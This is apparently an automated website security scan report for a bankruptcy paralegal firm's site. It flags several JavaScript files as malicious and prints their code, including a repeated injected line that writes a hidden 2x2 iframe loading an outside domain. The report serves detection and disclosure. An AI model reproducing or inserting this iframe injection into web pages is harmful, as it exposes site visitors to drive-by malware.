Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ebankruptcyparalegal.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ebankruptcyparalegal.com/ | 200 OK Content-Length: 7438 Content-Type: text/html | clean |
http://www.ebankruptcyparalegal.com/header.js | 200 OK Content-Length: 2429 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
<!-- Begin HEADER OPTIONS CODE
var color = "819AC0"
var flashwidth = "600"
var flashheight = "50"
var logotype = "flash"
var flashmode = "transparent"
var spaceunder = "10"
var phonenum = "201-702-1377"
var headlink = "contact.htm"
var linktext = "CONTACT US"
document.write('<table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="left" valign="middle">');
if (logotype == "flash") {
document.write('<object document.write('<img src="picts/spacer.gif" border="0" width="200" height="1"><br>');
document.write('</td></tr></table>');
document.write('<img src="picts/spacer.gif" border="0" width="10" height="'+spaceunder+'"><br>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=279566
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566>
http://www.ebankruptcyparalegal.com/menu.js | 200 OK Content-Length: 1560 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
<!-- Begin
var menuside ="left"
document.write('<table cellpadding="0" cellspacing="0" border="0" class="menu-table"><tr><td align="'+menuside+'">');
document.write('<table cellpadding="0" cellspacing="0" border="0"><tr><td align="center">');
document.write('<a href="index.html" class="menu firstmenu">Home</a>');
document.write('</td><td align="center">');
document.write('<a href="about.htm" class="menu"& document.write('<a href="contact.htm" class="menu">Contact</a>');
document.write('</td><td align="center">');
document.write('</td></tr></table>');
document.write('</td></tr></table>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=279566
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566>
http://www.ebankruptcyparalegal.com/social-links.js | 200 OK Content-Length: 1170 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
<!-- Begin
var social = "yes"
if (social == "yes") {
document.write('<br>');
document.write('Connect with us on:<br>');
document.write('<table cellpadding="4" cellspacing="0" border="0"><tr><td>');
document.write('<a href="http://twitter.com/ebankruptcy"><img src="picts/social_twitter.gif" border="0" alt="Twitter"></a><br>');
document.write('</td><td>');
document.write('<a href="http://www.f document.write('<a href="http://www.linkedin.com/pub/ebankruptcy-paralegal-llc/49/615/625"><img src="picts/social_linkedin.gif" border="0" alt="LinkedIn"></a><br>');
document.write('</td></tr></table>');
document.write('<hr class="page-splits">');
}
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=279566
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566>
http://www.ebankruptcyparalegal.com/copyright.js | 200 OK Content-Length: 529 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=279566
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566>
http://www.ebankruptcyparalegal.com/services.htm | 200 OK Content-Length: 7558 Content-Type: text/html | clean |
http://www.ebankruptcyparalegal.com/CLIENT-INTAKE-FORM.pdf | 200 OK Content-Length: 302317 Content-Type: application/pdf | clean |
http://www.ebankruptcyparalegal.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://www.ebankruptcyparalegal.com/client-intake-form-spanish.pdf | 200 OK Content-Length: 300869 Content-Type: application/pdf | clean |
http://www.ebankruptcyparalegal.com/Benefits.htm | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://www.ebankruptcyparalegal.com/contact.htm | 200 OK Content-Length: 4519 Content-Type: text/html | clean |
http://www.ebankruptcyparalegal.com/contact.js | 200 OK Content-Length: 798 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://mntracing.com/showthread.php?sid=279566
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mntracing.com/showthread.php?sid=279566>
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ebankruptcyparalegal.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ebankruptcyparalegal.com
Referer: http://www.google.com/search?q=ebankruptcyparalegal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.